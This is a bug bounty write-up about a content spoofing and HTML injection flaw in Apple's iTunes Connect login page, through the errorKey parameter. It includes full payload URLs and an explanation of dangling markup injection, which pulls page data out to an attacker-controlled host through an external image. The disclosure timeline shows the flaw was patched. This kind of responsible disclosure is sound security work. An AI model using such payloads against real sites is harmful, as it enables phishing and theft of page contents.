A short story of Content Spoofing to HTML Injection in Apple using Dangling Markup Injection

Content Spoofing is an injection in which user input is reflected as it is in the application response which can be used in phishing attacks.

During the recon phase, I found itunesconnect.apple.com, subdomain of apple and after digging into it, I had observed that the content of errorKey parameter was reflecting back to the page as shown below

Payload - https://itunesconnect.apple.com/login?errorKey=This%20message%20can%20be%20changed%20by%20attacker.%20This%20is%20content%20spoofing%20till%20now.%20Let%20try%20to%20exploit%20it%20further.

Content Spoofing till here

With normal inline Cross Site Scripting(XSS) payloads, the application was giving blank pop up. After trying different scenarios, I have observed that dangling markup injection is possible on vulnerable parameter (errorKey)

Let’s understand the concept of Dangling Markup Injection

Dangling markup injection is very useful where we can’t find a way to execute our JavaScript due to input filters, content security policy, or other obstacles payloads but we can inject some HTML tags. It is use to steal the contents of the page without script by using resources such as images to send the data to a remote location that an attacker controls.

For our exploitation, I had used CSS @import as a payload. The main purpose of @import method is to use multiple style sheets on a page.

Time for the final payload having a broken image linked to itunesconnect.apple.com itself which led to HTML injection.

Payload - https://itunesconnect.apple.com/login?errorKey=%3C%3Cstyle%3E@import%2F%2Fcontent-spoofing-to-possible%20xss%3F%3C---%20Injected%20%3Ca%20href%3Dhttps:%2F%2Fitunesconnect.apple.com%2Flogin%3FerrorKey%3DXSS-NOT-confirmed%3E%3Cimg%20src%3D%22https:%2F%2Fbitenapple.com%2Fmytest.jpeg%22%3E%3C%2Fa%3E%3C%2Fbr%3E%3C%2Fbr%3E%3C%2Fbr%3E%3Ch1%3EVulnerable%20to%20HTML%20Injection%3C%2Fh1%3E

Timeline

28th July 2021- Reported the issue to Apple Product Security Team.

29th July 2021- Got reply from Apple with the Follow-up ID.

14th September 2021- The issue was patched. Asked Apple Team for an update.

20th September 2021- Apple team acknowledged and asked for the details to mention on their credit page in the next update cycle. The required details was shared the same day.

22nd September 2021- Mailed Apple Team for approval to publish a blog around this issue.

23rd September 2021- Apple Team wanted to review and provide with feedback on the blog . Replied with the draft blog to the Apple.

1st October 2021- Apple Team provided the go ahead to publish the blog.

Reference

Senior Security Engineer at @Paytm | Ex- SAFE Security | Acknowledged by Apple, Google, Microsoft etc.| Security always Code rarely